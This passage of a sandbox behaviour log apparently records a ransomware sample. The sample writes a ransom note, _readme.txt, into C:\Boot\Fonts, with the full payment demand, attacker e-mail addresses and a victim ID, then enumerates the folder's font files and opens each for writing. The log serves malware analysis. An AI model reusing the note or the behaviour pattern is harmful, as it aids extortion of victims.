pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0178.897] FreeLibrary (hLibModule=0x759d0000) returned 1 [0178.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.898] PathAppendW (in: pszPath="C:\\Boot\\Fonts\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 1 [0178.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.898] PathFileExistsW (pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 0 [0178.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d32670 [0178.898] lstrcpyW (in: lpString1=0x2d32670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0178.898] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0178.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0178.898] CreateFileW (lpFileName="C:\\Boot\\Fonts\\_readme.txt" (normalized: "c:\\boot\\fonts\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0178.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32670 | out: hHeap=0x6a0000) returned 1 [0178.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.900] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*" (normalized: "c:\\boot\\fonts\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95768820, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x95768820, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0178.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.900] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95768820, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x95768820, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.900] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9571c560, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0178.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0178.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.901] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\chs_boot.ttf") returned=".ttf" [0178.901] CreateFileW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0178.902] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9571c560, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0178.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0178.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.902] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\cht_boot.ttf") returned=".ttf" [0178.902] CreateFileW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0178.916] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957426c0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x957426c0, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0178.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0178.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.916] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\jpn_boot.ttf") returned=".ttf" [0178.917] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0178.918] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957426c0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x957426c0, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0178.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0178.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.918] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\kor_boot.ttf") returned=".ttf" [0178.918] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0178.919] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95768820, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95768820, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0178.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0178.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.919] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned=".ttf" [0178.919] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0178.920] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95768820, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95768820, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0178.920] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0178.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0178.921] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0178.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0178.921] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0178.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.922] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.922] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.922] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.922] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.924] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.924] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.924] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0178.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 